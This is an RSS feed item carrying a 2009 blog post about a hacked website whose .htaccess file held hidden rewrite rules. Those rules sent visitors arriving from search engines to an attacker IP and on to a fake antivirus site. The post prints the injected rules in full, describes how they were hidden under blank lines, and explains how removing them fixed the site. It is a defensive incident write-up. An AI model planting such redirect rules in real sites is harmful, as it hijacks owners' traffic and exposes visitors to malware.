<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>64 Bit Jungle &#187; Security</title>
	<atom:link href="http://www.64bitjungle.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.64bitjungle.com</link>
	<description>Linux and Programming Tips and Tutorials, Technology and Rants from the Jungle</description>
	<lastBuildDate>Tue, 16 Feb 2010 13:33:57 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Gnarly Malware &#8211; Hijacks Website .htaccess and Steals Search Engine Traffic</title>
		<link>http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/</link>
		<comments>http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/#comments</comments>
		<pubDate>Wed, 14 Jan 2009 04:07:41 +0000</pubDate>
		<dc:creator>Hodge</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.64bitjungle.com/?p=294</guid>
		<description><![CDATA[A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>A friend in the US called me a few days ago, asking me to take a look at his website, <a href="http://www.calypsoislandtours.com" target="_blank">calypsoislandtours.com</a>, since his <a href="http://www.calypsoislandtours.com/blog/index.php/travel/travel-blog-website-hijacked-malware/" target="_blank">site traffic had dropped dramatically</a>, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic &#8211; not particularly good for his business.</p>
<p>I searched <a href="http://www.google.com" target="_blank">Google</a> for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn&#8217;t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:</p>
<p><code>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]<br />
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]</code></p>
<p>Which was also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess, the code would be &#8220;hidden&#8221; below the viewable window of an average text editor (I used the Linux command more, via ssh to check the file).</p>
<p>Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).</p>
<p>Using a combination of traceroute and Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sites  &#8211; first to <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=http://worldgreenpeace.cn" target="_blank">worldgreenpeace.cn (link to Google Safe Browsing Info Page)</a>, which installs a cookie: soft=1. This site then redirects the browser to the final target destination of <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=http://bestantivirusfastscan.com/" target="_blank">bestantivirusfastscan.com (link to Google Safe Browsing Info page)</a> which installs a cookie: av_inst=880147 (arbitrary ID number &#8211; although it seems that 880147 people may have been redirected already). This final site contains Malware, which I presume does something nasty, although I felt no inclination to investigate further!</p>
<p>Thankfully, it was easy to cure &#8211; I simply deleted the above lines from .htaccess, and the website was instantly be back to normal, receiving the search engine traffic it should.</p>
<p>So, if you&#8217;re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/button" title="Gnarly Malware - Hijacks Website .htaccess and Steals Search Engine Traffic" url="http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/"></script>

<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="sexy-scriptstyle">
			<a href="http://scriptandstyle.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Submit this to Script &amp; Style">Submit this to Script &amp; Style</a>
		</li>
		<li class="sexy-blinklist">
			<a href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;Title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Blinklist">Share this on Blinklist</a>
		</li>
		<li class="sexy-delicious">
			<a href="http://del.icio.us/post?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="sexy-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="sexy-diigo">
			<a href="http://www.diigo.com/post?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;desc=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="sexy-reddit">
			<a href="http://reddit.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="sexy-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;submitHeadline=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;submitSummary=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="sexy-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;t=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="sexy-designfloat">
			<a href="http://www.designfloat.com/submit.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Submit this to DesignFloat">Submit this to DesignFloat</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;t=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic+-+http://tinyurl.com/8r6tnb+(via+@64bitjungle)" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-mail">
			<a href="mailto:?subject=%22Gnarly%20Malware%20-%20Hijacks%20Website%20.htaccess%20and%20Steals%20Search%20Engine%20Traffic%22&amp;body=I%20thought%20this%20article%20might%20interest%20you.%0A%0A%22A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos%22%0A%0AYou%20can%20read%20the%20full%20article%20here%3A%20http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="sexy-tomuse">
			<a href="mailto:tips@tomuse.com?subject=New%20tip%20submitted%20via%20the%20SexyBookmarks%20Plugin!&amp;body=I%20would%20like%20to%20submit%20this%20article%3A%20%22Gnarly%20Malware%20-%20Hijacks%20Website%20.htaccess%20and%20Steals%20Search%20Engine%20Traffic%22%20for%20possible%20inclusion%20on%20ToMuse.%0A%0A%22A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos%22%0A%0AYou%20can%20read%20the%20full%20article%20here%3A%20http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Suggest this article to ToMuse">Suggest this article to ToMuse</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;summary=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos&amp;source=64 Bit Jungle" rel="nofollow" class="external" title="Share this on Linkedin">Share this on Linkedin</a>
		</li>
		<li class="sexy-newsvine">
			<a href="http://www.newsvine.com/_tools/seed&amp;save?u=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;h=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Seed this on Newsvine">Seed this on Newsvine</a>
		</li>
		<li class="sexy-devmarks">
			<a href="http://devmarks.com/index.php?posttext=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos&amp;posturl=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;posttitle=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Devmarks">Share this on Devmarks</a>
		</li>
		<li class="sexy-google">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="sexy-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;bm_description=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="sexy-izeby">
			<a href="http://izeby.com/submit.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Add this to Izeby">Add this to Izeby</a>
		</li>
		<li class="sexy-tipd">
			<a href="http://tipd.com/submit.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Share this on Tipd">Share this on Tipd</a>
		</li>
		<li class="sexy-pfbuzz">
			<a href="http://pfbuzz.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on PFBuzz">Share this on PFBuzz</a>
		</li>
		<li class="sexy-friendfeed">
			<a href="http://www.friendfeed.com/share?title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;link=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Share this on FriendFeed">Share this on FriendFeed</a>
		</li>
		<li class="sexy-blogmarks">
			<a href="http://blogmarks.net/my/new.php?mini=1&amp;simple=1&amp;url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Mark this on BlogMarks">Mark this on BlogMarks</a>
		</li>
		<li class="sexy-twittley">
			<a href="http://twittley.com/submit/?title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;url=http%3A%2F%2Fwww.64bitjungle.com%2Fweb-development%2Fgnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic%2F&amp;desc=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos&amp;pcat=Technology&amp;tags=" rel="nofollow" class="external" title="Submit this to Twittley">Submit this to Twittley</a>
		</li>
		<li class="sexy-fwisp">
			<a href="http://fwisp.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Share this on Fwisp">Share this on Fwisp</a>
		</li>
		<li class="sexy-designmoo">
			<a href="http://designmoo.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;body=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Moo this on DesignMoo!">Moo this on DesignMoo!</a>
		</li>
		<li class="sexy-bobrdobr">
			<a href="http://bobrdobr.ru/addext.html?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on BobrDobr">Share this on BobrDobr</a>
		</li>
		<li class="sexy-yandex">
			<a href="http://zakladki.yandex.ru/userarea/links/addfromfav.asp?bAddLink_x=1&amp;lurl=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;lname=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to Yandex.Bookmarks">Add this to Yandex.Bookmarks</a>
		</li>
		<li class="sexy-memoryru">
			<a href="http://memori.ru/link/?sm=1&amp;u_data[url]=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;u_data[name]=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to Memory.ru">Add this to Memory.ru</a>
		</li>
		<li class="sexy-100zakladok">
			<a href="http://www.100zakladok.ru/save/?bmurl=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;bmtitle=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to 100 bookmarks">Add this to 100 bookmarks</a>
		</li>
		<li class="sexy-moemesto">
			<a href="http://moemesto.ru/post.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to MyPlace">Add this to MyPlace</a>
		</li>
		<li class="sexy-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;t=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="sexy-printfriendly">
			<a href="http://www.printfriendly.com/print?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Send this page to Print Friendly">Send this page to Print Friendly</a>
		</li>
		<li class="sexy-designbump">
			<a href="http://designbump.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;body=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Bump this on DesignBump">Bump this on DesignBump</a>
		</li>
		<li class="sexy-ning">
			<a href="http://bookmarks.ning.com/addItem.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;T=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to Ning">Add this to Ning</a>
		</li>
		<li class="sexy-identica">
			<a href="http://identi.ca//index.php?action=newnotice&amp;status_textarea=Reading:+&quot;Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&quot;+-+from+http://tinyurl.com/8r6tnb" rel="nofollow" class="external" title="Post this to Identica">Post this to Identica</a>
		</li>
		<li class="sexy-xerpi">
			<a href="http://www.xerpi.com/block/add_link_from_extension?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Save this to Xerpi">Save this to Xerpi</a>
		</li>
		<li class="sexy-wikio">
			<a href="http://www.wikio.com/sharethis?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Wikio">Share this on Wikio</a>
		</li>
		<li class="sexy-techmeme">
			<a href="http://twitter.com/home/?status=Tip+@Techmeme+http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/+&quot;Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&quot;" rel="nofollow" class="external" title="Tip this to TechMeme">Tip this to TechMeme</a>
		</li>
		<li class="sexy-sphinn">
			<a href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="sexy-posterous">
			<a href="http://posterous.com/share?linkto=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;selection=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Post this to Posterous">Post this to Posterous</a>
		</li>
		<li class="sexy-globalgrind">
			<a href="http://globalgrind.com/submission/submit.aspx?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;type=Article&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Grind this! on Global Grind">Grind this! on Global Grind</a>
		</li>
		<li class="sexy-pingfm">
			<a href="http://ping.fm/ref/?link=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;body=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Ping this on Ping.fm">Ping this on Ping.fm</a>
		</li>
		<li class="sexy-nujij">
			<a href="http://nujij.nl/jij.lynkx?t=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;u=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;b=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Submit this to NUjij">Submit this to NUjij</a>
		</li>
		<li class="sexy-ekudos">
			<a href="http://www.ekudos.nl/artikel/nieuw?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;desc=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Submit this to eKudos">Submit this to eKudos</a>
		</li>
		<li class="sexy-netvouz">
			<a href="http://www.netvouz.com/action/submitBookmark?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;popup=no" rel="nofollow" class="external" title="Submit this to Netvouz">Submit this to Netvouz</a>
		</li>
		<li class="sexy-netvibes">
			<a href="http://www.netvibes.com/share?title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Submit this to Netvibes">Submit this to Netvibes</a>
		</li>
		<li class="sexy-fleck">
			<a href="http://beta3.fleck.com/bookmarklet.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Fleck">Share this on Fleck</a>
		</li>
		<li class="sexy-blogospherenews">
